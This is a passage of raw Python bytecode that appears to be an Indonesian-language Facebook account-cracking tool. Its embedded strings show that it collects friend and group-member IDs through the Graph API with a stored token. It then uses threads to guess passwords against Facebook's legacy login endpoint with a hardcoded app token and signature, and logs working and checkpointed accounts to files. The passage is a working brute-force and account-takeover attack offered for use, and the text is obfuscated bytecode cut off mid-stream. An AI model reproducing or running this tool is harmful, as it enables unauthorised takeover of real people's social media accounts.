Terget not found(\x16\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00R \x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Rd\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x06\x00\x00\x00urllibt\x07\x00\x00\x00urlopent\x04\x00\x00\x00loadRv\x00\x00\x00R\x16\x00\x00\x00R,\x00\x00\x00(\x10\x00\x00\x00R4\x00\x00\x00Rj\x00\x00\x00R\'\x00\x00\x00Rm\x00\x00\x00t\x03\x00\x00\x00pz1Rl\x00\x00\x00Ro\x00\x00\x00t\x03\x00\x00\x00pz2t\x03\x00\x00\x00pz3t\x05\x00\x00\x00lahirt\x03\x00\x00\x00pz4t\x06\x00\x00\x00lahirst\x03\x00\x00\x00gazt\x03\x00\x00\x00pz5t\x03\x00\x00\x00pz6t\x03\x00\x00\x00pz7(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xab\x00\x00\x00\xe5\x03\x00\x00s@\x01\x00\x00\x00\x01\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\t\x01\x03\x01\x0c\x01\n\x01\x1b\x01\x12\x01\r\x01\n\x01\r\x01\n\x01\r\x01\t\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x12\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\n\x01\x12\x01\x0e\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x06\x01\x1f\x01\x0f\x01\x0c\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x10\x01\x05\x01\x05\x01\r\x01\t\x01\t\x01\n\x01\n\x02\x05\x01\x05\x01\n\x01\x0b\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s6\x01\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00Wn7\x00\x04t\x04\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01t\x07\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\x08\x00GHt\t\x00d\x07\x00\x83\x01\x00a\n\x00t\t\x00d\x08\x00\x83\x01\x00a\x0b\x00y~\x00t\x02\x00t\n\x00d\x03\x00\x83\x02\x00a\x0c\x00t\r\x00d\t\x00\x83\x01\x00\x01xC\x00t\x0e\x00d\n\x00\x83\x01\x00D]5\x00}\x01\x00t\x0f\x00j\x10\x00d\x0b\x00t\x11\x00d\x0c\x00d\x0f\x00\x83\x00\x02}\x02\x00|\x02\x00j\x12\x00\x83\x00\x00\x01t\x13\x00j\x14\x00|\x02\x00\x83\x01\x00\x01q\xb3\x00Wx\x18\x00t\x13\x00D]\x10\x00}\x02\x00|\x02\x00j\x15\x00\x83\x00\x00\x01q\xf3\x00WWn\'\x00\x04t\x04\x00k\n\x00r1\x01\x01\x01\x01d\r\x00GHt\t\x00d\x0e\x00\x83\x01\x00\x01t\x16\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x10\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mFile ID \x1b[1;91m: \x1b[1;97ms+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mPassword \x1b[1;91m: \x1b[1;97ms$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...i(\x00\x00\x00t\x06\x00\x00\x00targett\x04\x00\x00\x00argss\x19\x00\x00\x00\x1b[1;91m[!] 
File not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m](\x00\x00\x00\x00(\x17\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00R/\x00\x00\x00t\x06\x00\x00\x00idlistt\x05\x00\x00\x00passwt\x04\x00\x00\x00fileR \x00\x00\x00t\x05\x00\x00\x00ranget\t\x00\x00\x00threadingt\x06\x00\x00\x00Threadt\x05\x00\x00\x00scrakt\x05\x00\x00\x00startt\x07\x00\x00\x00threadsR\x94\x00\x00\x00t\x04\x00\x00\x00joinRv\x00\x00\x00(\x03\x00\x00\x00R4\x00\x00\x00R\x10\x00\x00\x00Rn\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xac\x00\x00\x00\x98\x04\x00\x00s2\x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x0c\x01\x0c\x01\x03\x01\x0f\x01\n\x01\x13\x01\x18\x01\n\x01\x11\x01\r\x01\x12\x01\r\x01\x05\x01\n\x01c\x00\x00\x00\x00\t\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00sg\x02\x00\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r$\x00\x01\x01\x01n\x01\x00Xy\xfd\x01t\x03\x00t\x04\x00d\x02\x00\x83\x02\x00}\x00\x00|\x00\x00j\x05\x00\x83\x00\x00j\x06\x00\x83\x00\x00a\x07\x00x\xd5\x01t\x08\x00r \x02t\x08\x00j\t\x00\x83\x00\x00j\n\x00\x83\x00\x00}\x01\x00d\x03\x00|\x01\x00\x17d\x04\x00\x17t\x0b\x00\x17d\x05\x00\x17}\x02\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00}\x03\x00t\x0e\x00j\x0f\x00|\x03\x00\x83\x01\x00}\x04\x00t\x10\x00t\x11\x00t\x07\x00\x83\x01\x00k\x02\x00r\xae\x00Pn\x00\x00d\x06\x00|\x04\x00k\x06\x00rE\x01t\x03\x00d\x07\x00d\x08\x00\x83\x02\x00}\x05\x00|\x05\x00j\x12\x00|\x01\x00d\t\x00\x17t\x0b\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x05\x00j\x13\x00\x83\x00\x00\x01t\x14\x00j\x15\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x04\x00d\x06\x00\x19\x17\x83\x01\x00}\x06\x00t\x0e\x00j\x16\x00|\x06\x00j\x17\x00\x83\x01\x00}\x07\x00t\x18\x00j\x19\x00d\r\x00|\x01\x00\x17d\t\x00\x17t\x0b\x00\x17d\x0e\x00\x17|\x07\x00d\x0f\x00\x19\x17\x83\x01\x00\x01nu\x00d\x10\x00|\x04\x00d\x11\x00\x19k\x06\x00r\xa3\x01t\x03\x00d\x12\x00d\x08\x00\x83\x02\x00}\x08\x00|\x08\x00j\x12\x00|\x01\x00d\t\x00\x17t\x0b\x00\x17d\n\x00\x17\x83\x01\x00\x01|\x08\x00j\x13\x00\x83\x00\x00\x01t\x1a\x00j\x19\x00d\x13\x00|\x01\x00\x17d\t\x00\x17t\x0b\x00\x17\x83\x01\x00\x01n\x17\x00t\x1b\x00j\x19\x00|\x01\x00\x83\x01\x00\x01t\x10\x00d\x14\x007a\x10\x00t\x1c\x00j\x1d\x00j\x12\x00d\x15\x00t\x1e\x00t\x10\x00\x83\x01\x00\x17d\x16\x00\x17t\x1e\x00t\x11\x00t\x07\x00\x83\x01\x00\x83\x01\x00\x17d\x17\x00\x17t\x1e\x00t\x11\x00t\x18\x00\x83\x01\x00\x83\x01\x00\x17d\x18\x00\x17t\x1e\x00t\x11\x00t\x1a\x00\x83\x01\x00\x83\x01\x00\x17\x83\x01\x00\x01t\x1c\x00j\x1d\x00j\x1f\x00\x83\x00\x00\x01qL\x00WWn>\x00\x04t \x00k\n\x00rG\x02\x01\x01\x01d\x19\x00GHt!\x00j"\x00d\x14\x00\x83\x01\x00\x01n\x1c\x00\x04t\x14\x00j#\x00j$\x00k\n\x00rb\x02\x01\x01\x01d\x1a\x00GHn\x01\x00Xd\x00\x00S(\x1b\x00\x00\x00NR\x90\x00\x00\x00R\'\x00\x00\x00s\x91\x00\x00\x00https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=s\x17\x00\x00\x00&locale=en_US&password=sH\x00\x00\x00&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6RQ\x00\x00\x00s\x0e\x00\x00\x00out/mbf_ok.txtR\x11\x00\x00\x00t\x01\x00\x00\x00|s\x01\x00\x00\x00\ns\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s\x1f\x00\x00\x00\x1b[1;97m[ \x1b[1;92mOK\xe2\x9c\x93\x1b[1;97m ] s\x03\x00\x00\x00 
=>R0\x00\x00\x00s\x10\x00\x00\x00www.facebook.comR\xb4\x00\x00\x00s\x0e\x00\x00\x00out/mbf_cp.txts\x1f\x00\x00\x00\x1b[1;97m[ \x1b[1;93mCP\xe2\x9c\x9a\x1b[1;97m ] i\x01\x00\x00\x00s<\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;91m:\x1b[1;97m s\x11\x00\x00\x00 \x1b[1;96m>\x1b[1;97m s\x1d\x00\x00\x00 =>\x1b[1;92mLive\x1b[1;91m:\x1b[1;96ms%\x00\x00\x00 \x1b[1;97m=>\x1b[1;93mCheck\x1b[1;91m:\x1b[1;96ms\x11\x00\x00\x00\n\x1b[1;91m[!] Sleeps\x1a\x00\x00\x00\x1b[1;91m[\xe2\x9c\x96] No connection(%\x00\x00\x00R\x05\x00\x00\x00R\x91\x00\x00\x00R\x92\x00\x00\x00R)\x00\x00\x00R\xca\x00\x00\x00R*\x00\x00\x00t\x05\x00\x00\x00splitt\x02\x00\x00\x00upR\xcc\x00\x00\x00t\x08\x00\x00\x00readlinet\x05\x00\x00\x00stripR\xcb\x00\x00\x00R\xbb\x00\x00\x00R\xbc\x00\x00\x00Rd\x00\x00\x00R\xbd\x00\x00\x00t\x04\x00\x00\x00backR\x0e\x00\x00\x00R\x19\x00\x00\x00Rg\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00Re\x00\x00\x00Rf\x00\x00\x00t\x08\x00\x00\x00berhasilR\x94\x00\x00\x00t\x08\x00\x00\x00cekpointt\x05\x00\x00\x00gagalR\x06\x00\x00\x00R\x18\x00\x00\x00R\x17\x00\x00\x00R\x1b\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00Ri\x00\x00\x00R\x01\x00\x00\x00(\t\x00\x00\x00t\x04\x00\x00\x00bukat\x08\x00\x00\x00usernameRk\x00\x00\x00Rl\x00\x00\x00t\x04\x00\x00\x00mpsht\x04\x00\x00\x00bisaR\x10\x00\x00\x00R\x1e\x00\x00\x00R7\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xd0\x00\x00\x00\xb4\x04\x00\x00sF\x00\x00\x00\x00\x02\x03\x01\x11\x01\r\x01\x04\x01\x03\x01\x0f\x01\x12\x01\t\x01\x12\x01\x16\x01\x0f\x01\x0f\x01\x12\x01\x04\x01\x0c\x01\x0f\x01\x19\x01\n\x01\x1f\x01\x12\x01(\x01\x10\x01\x0f\x01\x19\x01\n\x01\x1c\x02\r\x01\n\x01V\x00\x15\x01\r\x01\x05\x01\x10\x01\x13\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s_\x00\x00\x00Hd\x01\x00d\x02\x00\x14GHx\x13\x00t\x00\x00D]\x0b\x00}\x00\x00|\x00\x00GHq\x11\x00Wx\x13\x00t\x01\x00D]\x0b\x00}\x01\x00|\x01\x00GHq\'\x00Wd\x01\x00d\x02\x00\x14GHd\x03\x00t\x02\x00t\x03\x00t\x04\x00\x83\x01\x00\x83\x01\x00\x17GHt\x05\x00\x83\x00\x00\x01d\x00\x00S(\x04\x00\x00\x00Ni*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90s\x1b\x00\x00\x00\x1b[31m[x] Failed \x1b[1;97m--> (\x06\x00\x00\x00R\xda\x00\x00\x00R\xdb\x00\x00\x00R\x17\x00\x00\x00R\x0e\x00\x00\x00R\xdc\x00\x00\x00R\x08\x00\x00\x00(\x02\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00c(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xad\x00\x00\x00\xda\x04\x00\x00s\x12\x00\x00\x00\x00\x01\x01\x01\t\x02\r\x01\t\x02\r\x01\t\x02\t\x01\x15\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x96\x00\x00\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01y\x19\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00a\x04\x00Wn7\x00\x04t\x05\x00k\n\x00r_\x00\x01\x01\x01d\x04\x00GHt\x00\x00j\x01\x00d\x05\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x06\x00\x83\x01\x00\x01t\x08\x00\x83\x00\x00\x01n\x01\x00Xt\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01t\t\x00GHd\x07\x00GHd\x08\x00GHd\t\x00GHd\n\x00GHd\x0b\x00GHt\n\x00\x83\x00\x00\x01d\x00\x00S(\x0c\x00\x00\x00NR&\x00\x00\x00s\t\x00\x00\x00login.txtR\'\x00\x00\x00s\x1a\x00\x00\x00\x1b[1;91m[!] Token not founds\x10\x00\x00\x00rm -rf login.txti\x01\x00\x00\x00s\x15\x00\x00\x001]. Crack list friends\x16\x00\x00\x002]. Crack from friends\x1b\x00\x00\x003]. Crack from member groups\x08\x00\x00\x000]. 
Backs\x03\x00\x00\x00\xe2\x95\x91(\x0b\x00\x00\x00R\x05\x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00R*\x00\x00\x00R4\x00\x00\x00R-\x00\x00\x00R\x1c\x00\x00\x00R\x1d\x00\x00\x00R2\x00\x00\x00R.\x00\x00\x00t\x0b\x00\x00\x00pilih_super(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00<s>R\xae\x00\x00\x00\xe9\x04\x00\x00s \x00\x00\x00\x00\x02\r\x01\x03\x01\x19\x01\r\x01\x05\x01\r\x01\r\x01\x0b\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x0f\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x84\x03\x00\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x02\x00k\x02\x00r\'\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01n|\x02|\x00\x00d\x04\x00k\x02\x00r\x9d\x00t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x05\x00d\x06\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x07\x00t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00x,\x02|\x02\x00d\x08\x00\x19D]\x17\x00}\x03\x00t\x0c\x00j\r\x00|\x03\x00d\t\x00\x19\x83\x01\x00\x01q\x7f\x00Wn\x06\x02|\x00\x00d\n\x00k\x02\x00r\x8f\x01t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x00\x00d\x0b\x00\x83\x01\x00}\x04\x00y>\x00t\x06\x00j\x07\x00d\x0c\x00|\x04\x00\x17d\r\x00\x17t\x08\x00\x17\x83\x01\x00}\x05\x00t\t\x00j\n\x00|\x05\x00j\x0b\x00\x83\x01\x00}\x06\x00d\x0e\x00|\x06\x00d\x0f\x00\x19\x17GHWn\'\x00\x04t\x0e\x00k\n\x00r.\x01\x01\x01\x01d\x10\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00d\x12\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x0c\x00|\x04\x00\x17d\x13\x00\x17t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\x02\x00x:\x01|\x02\x00d\x08\x00\x19D]\x17\x00}\x07\x00t\x0c\x00j\r\x00|\x07\x00d\t\x00\x19\x83\x01\x00\x01qq\x01Wn\x14\x01|\x00\x00d\x14\x00k\x02\x00r\x81\x02t\x02\x00j\x03\x00d\x05\x00\x83\x01\x00\x01t\x04\x00GHt\x00\x00d\x15\x00\x83\x01\x00}\x08\x00y>\x00t\x06\x00j\x07\x00d\x16\x00|\x08\x00\x17d\x17\x00\x17t\x08\x00\x17\x83\x01\x00}\x01\x00t\t\x00j\n\x00|\x01\x00j\x0b\x00\x83\x01\x00}\t\x00d\x18\x00|\t\x00d\x0f\x00\x19\x17GHWn\'\x00\x04t\x0e\x00k\n\x00r \x02\x01\x01\x01d\x19\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00d\x1a\x00\x83\x01\x00\x01t\x06\x00j\x07\x00d\x0c\x00|\x08\x00\x17d\x1b\x00\x17t\x08\x00\x17\x83\x01\x00}\n\x00t\t\x00j\n\x00|\n\x00j\x0b\x00\x83\x01\x00}\x03\x00xH\x00|\x03\x00d\x08\x00\x19D]\x17\x00}\x0b\x00t\x0c\x00j\r\x00|\x0b\x00d\t\x00\x19\x83\x01\x00\x01qc\x02Wn"\x00|\x00\x00d\x1c\x00k\x02\x00r\x97\x02t\x10\x00\x83\x00\x00\x01n\x0c\x00d\x03\x00GHt\x01\x00\x83\x00\x00\x01d\x1d\x00t\x11\x00t\x12\x00t\x0c\x00\x83\x01\x00\x83\x01\x00\x17GHt\x05\x00d\x1e\x00\x83\x01\x00\x01d\x1f\x00d \x00d!\x00g\x03\x00}\x0c\x00x0\x00|\x0c\x00D](\x00}\r\x00d"\x00|\r\x00\x17Gt\x13\x00j\x14\x00j\x15\x00\x83\x00\x00\x01t\x16\x00j\x17\x00d#\x00\x83\x01\x00\x01q\xd8\x02WHd$\x00d%\x00\x14GHd&\x00\x84\x00\x00}\x0e\x00t\x18\x00d\'\x00\x83\x01\x00}\x0b\x00|\x0b\x00j\x19\x00|\x0e\x00t\x0c\x00\x83\x02\x00\x01d$\x00d%\x00\x14GHd(\x00GHd)\x00t\x11\x00t\x12\x00t\x1a\x00\x83\x01\x00\x83\x01\x00\x17d*\x00\x17t\x11\x00t\x12\x00t\x1b\x00\x83\x01\x00\x83\x01\x00\x17GHd+\x00GHt\x00\x00d\x11\x00\x83\x01\x00\x01t\x0f\x00\x83\x00\x00\x01d\x00\x00S(,\x00\x00\x00Ns\x1d\x00\x00\x00\x1b[1;97m\xe2\x95\x9a\xe2\x95\x90\x1b[1;91mD \x1b[1;97mR\n\x00\x00\x00s\x16\x00\x00\x00\x1b[1;91m[!] 
Wrong inputR8\x00\x00\x00R&\x00\x00\x00s0\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all friend id \x1b[1;97m...s3\x00\x00\x00https://graph.facebook.com/me/friends?access_token=Rl\x00\x00\x00Rj\x00\x00\x00R9\x00\x00\x00s2\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID friend \x1b[1;91m: \x1b[1;97ms\x1b\x00\x00\x00https://graph.facebook.com/s\x0e\x00\x00\x00?access_token=s7\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m R0\x00\x00\x00s\x1b\x00\x00\x00\x1b[1;91m[!] Friend not founds\x1e\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]s5\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet all id from friend \x1b[1;97m...s\x16\x00\x00\x00/friends?access_token=Rs\x00\x00\x00s1\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mInput ID group \x1b[1;91m:\x1b[1;97m s%\x00\x00\x00https://graph.facebook.com/group/?id=s\x0e\x00\x00\x00&access_token=s=\x00\x00\x00\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom group \x1b[1;91m:\x1b[1;97m s\x1a\x00\x00\x00\x1b[1;91m[!] Group not founds2\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mGet group member id \x1b[1;97m...s5\x00\x00\x00/members?fields=name,id&limit=999999999&access_token=R:\x00\x00\x00s+\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTotal ID \x1b[1;91m: \x1b[1;97ms$\x00\x00\x00\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mStart \x1b[1;97m...s\x04\x00\x00\x00. s\x04\x00\x00\x00.. s\x04\x00\x00\x00... s0\x00\x00\x00\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mCrack \x1b[1;97mi\x01\x00\x00\x00i*\x00\x00\x00s\n\x00\x00\x00\x1b[1;97m\xe2\x95\x90c\x01\x00\x00\x00\x0e\x00\x00\x00\x05\x00\x00\x00S\x00\x00\x00sZ\x05\x00\x00|\x00\x00}\x01\x00y\x11\x00t\x00\x00j\x01\x00d\x01\x00\x83\x01\x00\x01Wn\x11\x00\x04t\x02\x00k\n\x00r*\x00\x01\x01\x01n\x01\x00Xy!\x05t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\x03\x00\x17t\x05\x00\x17\x83\x01\x00}\x02\x00t\x06\x00j\x07\x00|\x02\x00j\x08\x00\x83\x01\x00}\x03\x00|\x03\x00d\x04\x00\x19d\x05\x00\x17}\x04\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x04\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\x05\x01t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x04\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01nF\x04d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00r[\x01t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x04\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x04\x00\x17\x83\x01\x00\x01n\xf0\x03d\x14\x00}\n\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\n\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xfd\x01t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\n\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01nN\x03d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rS\x02t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\n\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\n\x00\x17\x83\x01\x00\x01n\xf8\x02|\x03\x00d\x04\x00\x19d\x15\x00\x17}\x0b\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0b\x00\x17d\x08\
x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xfd\x02t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x0b\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01nN\x02d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rS\x03t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x0b\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0b\x00\x17\x83\x01\x00\x01n\xf8\x01d\x16\x00}\x0c\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\x0c\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xf5\x03t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\x0c\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01nV\x01d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rK\x04t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\x0c\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\x0c\x00\x17\x83\x01\x00\x01n\x00\x01|\x03\x00d\x17\x00\x19d\x05\x00\x17}\r\x00t\t\x00j\n\x00d\x06\x00|\x01\x00\x17d\x07\x00\x17|\r\x00\x17d\x08\x00\x17\x83\x01\x00}\x05\x00t\x06\x00j\x0b\x00|\x05\x00\x83\x01\x00}\x06\x00d\t\x00|\x06\x00k\x06\x00r\xf5\x04t\x03\x00j\x04\x00d\x02\x00|\x01\x00\x17d\n\x00\x17|\x06\x00d\t\x00\x19\x17\x83\x01\x00}\x07\x00t\x06\x00j\x07\x00|\x07\x00j\x08\x00\x83\x01\x00}\x08\x00d\x0b\x00|\x01\x00\x17d\x0c\x00\x17|\r\x00\x17d\r\x00\x17|\x08\x00d\x0e\x00\x19\x17GHt\x0c\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01nV\x00d\x0f\x00|\x06\x00d\x10\x00\x19k\x06\x00rK\x05t\x0e\x00d\x11\x00d\x12\x00\x83\x02\x00}\t\x00|\t\x00j\x0f\x00|\x01\x00d\x0c\x00\x17|\r\x00\x17d\x13\x00\x17\x83\x01\x00\x01|\t\x00j\x10\x00\x83\x00\x00\x01t\x11\x00j\r\x00|\x01\x00|\r\x00\x17\x83\x01\x00\x01n